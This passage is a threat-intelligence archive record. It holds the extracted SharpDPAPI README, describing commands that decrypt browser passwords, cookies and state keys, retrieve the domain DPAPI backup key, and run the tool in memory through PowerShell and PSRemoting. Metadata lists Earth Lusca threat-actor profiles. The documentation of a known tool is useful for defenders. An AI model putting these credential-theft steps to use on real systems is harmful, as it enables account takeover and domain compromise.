structure:\r\n0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01, 0x15, 0xD1, 0x11, 0x8C, 0x7A, 0x00, 0xC0, 0x4F, 0xC2, 0x9\r\nThe search command has different arguments depending on the data type being scanned. To designate the data\r\ntype, use the /type argument specifying registry , folder , file , or base64 . If the /type argument is\r\nnot present, the command will search the registry by default.\r\nWhen searching the registry with no other arguments, the command will recursively search the\r\nHKEY_LOCAL_MACHINE and HKEY_USERS hives. Use /path parameter to specify a root to key to search\r\nfrom (e.g. /path:HKLM\\Software ) and use the /showErrors argument to display errors that occuring during\r\nenumeration.\r\nWhen searching a file or folder, specify a path with /path:C:\\Path\\to\\file\\or\\folder and optionally use\r\n/maxBytes:\u003cint\u003e to specify the number of bytes to read from each file (default: 1024 bytes). The command will\r\nread the bytes from the beginning of the file and search for DPAPI blobs. Use /showErrors to display an errors\r\nthat occur during enumeration.\r\nWhen searching a base64 blob, specify the base64-encoded bytes to scan with the /base64:\u003cbase64 str\u003e\r\nparameter.\r\nSCCM\r\nIf elevated on a machine that is an SCCM client, if the SCCM environment is configured with a Network Access\r\nAccount (NAA), the system master key-protected DPAPI blobs containing the NAA credentials can be retrieved\r\nvia WMI; The SCCM command will query the blobs via WMI, retrieve the system master keys, and decrypt the\r\nblobs.\r\nSharpChrome Commands\r\nlogins\r\nThe logins command will search for Chrome 'Login Data' files and decrypt the saved login passwords. If\r\nexecution is in an unelevated contect, CryptProtectData() will automatically be used to try to decrypt values. If\r\n/browser:edge is specified, the newer Chromium-based Edge browser is triaged.\r\nLogin Data files can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nuser masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nA specific Login Data file can be specified with /target:FILE . A remote /server:SERVER can be specified if a\r\n/pvk or /password is also supplied. If triaging newer Chrome/Edge instances, a /statekey:X AES state key\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 32 of 35\n\ncan be specified.\r\nBy default, logins are displayed in a csv format. This can be modified with /format:table for table output. Also,\r\nby default only non-null password value entries are displayed, but all values can be displayed with /showall .\r\nIf run from an elevated context, Login Data files for ALL users will be triaged, otherwise only Login Data files for\r\nthe current user will be processed.\r\ncookies\r\nThe cookies command will search for Chromium 'Cookies' files and decrypt cookie values. If execution is in an\r\nunelevated contect, CryptProtectData() will automatically be used to try to decrypt values. You can change the\r\ntarget application using the /browser:\u003cVALUE\u003e (e.g., edge, brave, slack).\r\nCookie files can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nuser masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nA specific Cookies file can be specified with /target:FILE . A remote /server:SERVER can be specified if a\r\n/pvk or /password is also supplied. If triaging newer Chrome/Edge instances, a /statekey:X AES state key\r\ncan be specified.\r\nBy default, cookies are displayed in a csv format. This can be modified with /format:table for table output, or\r\n/format:json for output importable by EditThisCookie. Also, by default only non-expired cookie value entries\r\nare displayed, but all values can be displayed with /showall .\r\nIf run from an elevated context, Cookie files for ALL users will be triaged, otherwise only Cookie files for the\r\ncurrent user will be processed.\r\nThe cookies command also has /cookie:REGEX and /url:REGEX arguments to only return cookie names or urls\r\nmatching the supplied regex. This is useful with /format:json to easily clone access to specific sites.\r\nstatekeys\r\nBy default, the statekeys command will search for Chromium-based applications (Google Chrome, Edge, Brave,\r\nand Slack), locate their AES statekey files (e.g., 'AppData\\Local\\Google\\Chrome\\User Data\\Local State' and\r\n'AppData\\Local\\Microsoft\\Edge\\User Data\\Local State'), and decrypt them using the same type of arguments that\r\ncan be supplied for cookies and logins . You may also supply the path to a specific state-key file using the\r\n/target: parameter (e.g., \"/target:C:\\Users\\Test\\appdata\\Local\\Google\\Chrome\\User Data\\Local State\" ).\r\nState keys can also be decrypted with a) any \"{GUID}:SHA1 {GUID}:SHA1 ...\" masterkeys passed, b) a\r\n/mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c) a supplied DPAPI domain backup key\r\n( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user masterkeys, or d) a /password:X to decrypt any\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 33 of 35\n\nuser masterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nIf run from an elevated context, state keys for ALL users will be triaged, otherwise only state keys for the current\r\nuser will be processed.\r\nbackupkey\r\nThe backupkey command will retrieve the domain DPAPI backup key from a domain controller using the\r\nLsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key\r\nblobs for any user on the domain. And even better, the key never changes ;)\r\nDomain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.\r\nThe /nowrap flag will prevent wrapping the base64 key on display.\r\nThis base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey\r\n/in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys,\r\ncredentials, or vault SharpDPAPI commands.\r\nBy default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A\r\nserver can be specified with /server:COMPUTER.domain.com . If you want the key saved to disk instead of output\r\nas a base64 blob, use /file:key.pvk .\r\nCompile Instructions\r\nWe are not planning on releasing binaries for SharpDPAPI, so you will have to compile yourself :)\r\nSharpDPAPI has been built against .NET 3.5 and is compatible with Visual Studio 2019 Community Edition.\r\nSimply open up the project .sln, choose \"Release\", and build.\r\nTargeting other .NET versions\r\nSharpDPAPI's default build configuration is for .NET 3.5, which will fail on systems without that version\r\ninstalled. To target SharpDPAPI for .NET 4 or 4.5, open the .sln solution, go to Project -\u003e SharpDPAPI\r\nProperties and change the \"Target framework\" to another version.\r\nSidenote: Running SharpDPAPI Through PowerShell\r\nIf you want to run SharpDPAPI in-memory through a PowerShell wrapper, first compile the SharpDPAPI and\r\nbase64-encode the resulting assembly:\r\n[Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\SharpDPAPI.exe\")) | Out-File -Encoding ASCII C:\\Temp\r\nSharpDPAPI can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the\r\nbase64-encoded SharpDPAPI assembly string):\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 34 of 35\n\n$SharpDPAPIAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\r\nThe Main() method and any arguments can then be invoked as follows:\r\n[SharpDPAPI.Program]::Main(\"machinemasterkeys\")\r\nSidenote Sidenote: Running SharpDPAPI Over PSRemoting\r\nDue to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily,\r\nSharpDPAPI has a function to help with that.\r\nIf you follow the instructions in Sidenote: Running SharpDPAPI Through PowerShell to create a\r\nSharpDPAPI.ps1, append something like the following to the script:\r\n[SharpDPAPI.Program]::MainString(\"machinemasterkeys\")\r\nYou should then be able to run SharpDPAPI over PSRemoting with something like the following:\r\n$s = New-PSSession dc.theshire.local\r\nInvoke-Command -Session $s -FilePath C:\\Temp\\SharpDPAPI.ps1\r\nAlternatively, SharpDPAPI /consoleoutfile:C:\\FILE.txt argument will redirect all output streams to the\r\nspecified file.\r\nSource: https://github.com/GhostPack/SharpDPAPI#certificates\r\nhttps://github.com/GhostPack/SharpDPAPI#certificates\r\nPage 35 of 35", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://github.com/GhostPack/SharpDPAPI#certificates" ], "report_names": [ "SharpDPAPI#certificates" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434266, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.pdf", "text": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.txt", "img": "https://archive.orkl.eu/b284a0a525992ee7cc41d5392553dc1c24ffc2e0.jpg" } }